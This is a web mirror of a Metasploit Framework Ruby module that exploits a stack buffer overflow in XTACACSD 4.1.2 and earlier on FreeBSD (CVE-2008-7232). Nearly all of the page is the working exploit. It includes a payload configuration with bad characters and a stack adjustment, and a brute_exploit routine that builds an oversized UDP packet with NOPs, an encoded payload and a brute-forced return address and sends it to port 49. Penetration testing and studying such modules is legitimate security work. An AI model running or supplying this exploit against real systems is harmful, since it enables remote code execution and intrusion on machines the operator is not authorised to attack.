Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/freebsd/tacacs/xtacacsd_report.rb
19670 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = AverageRanking
8
9
include Msf::Exploit::Remote::Udp
10
include Msf::Exploit::Brute
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'XTACACSD report() Buffer Overflow',
17
'Description' => %q{
18
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By
19
sending a specially crafted XTACACS packet with an overly long
20
username, an attacker may be able to execute arbitrary code.
21
},
22
'Author' => 'MC',
23
'References' => [
24
['CVE', '2008-7232'],
25
['OSVDB', '58140'],
26
['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'],
27
],
28
'Payload' => {
29
'Space' => 175,
30
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20",
31
'StackAdjustment' => -3500,
32
'PrependEncoder' => "\x83\xec\x7f",
33
'DisableNops' => true
34
},
35
'Platform' => 'bsd',
36
'Arch' => ARCH_X86,
37
'Targets' => [
38
[
39
'FreeBSD 6.2-Release Bruteforce',
40
{
41
'Bruteforce' =>
42
{
43
'Start' => { 'Ret' => 0xbfbfea00 },
44
'Stop' => { 'Ret' => 0xbfbfef00 },
45
'Step' => 24
46
}
47
},
48
],
49
],
50
'Privileged' => true,
51
'DefaultTarget' => 0,
52
'DisclosureDate' => '2008-01-08',
53
'Notes' => {
54
'Stability' => [ CRASH_SERVICE_RESTARTS, ],
55
'Reliability' => [ REPEATABLE_SESSION, ],
56
'SideEffects' => [ IOC_IN_LOGS, ]
57
}
58
)
59
)
60
61
register_options([Opt::RPORT(49)])
62
end
63
64
def brute_exploit(address)
65
connect_udp
66
67
sploit = "\x80" # Version
68
sploit << "\x05" # Type: Connect
69
sploit << "\xff\xff" # Nonce
70
sploit << "\xff" # Username length
71
sploit << "\x00" # Password length
72
sploit << "\x00" # Response
73
sploit << "\x00" # Reason
74
sploit << "\xff\xff\xff\xff" # Result 1
75
sploit << "\xff\xff\xff\xff" # Destination address
76
sploit << "\xff\xff" # Destination port
77
sploit << "\xff\xff" # Line
78
sploit << "\x00\x00\x00\x00" # Result 2
79
sploit << "\x00\x00" # Result 3
80
sploit << make_nops(238 - payload.encoded.length)
81
sploit << payload.encoded + [address['Ret']].pack('V')
82
83
print_status("Trying target #{target.name} #{'%.8x' % address['Ret']}...")
84
udp_sock.put(sploit)
85
86
disconnect_udp
87
end
88
end
89
90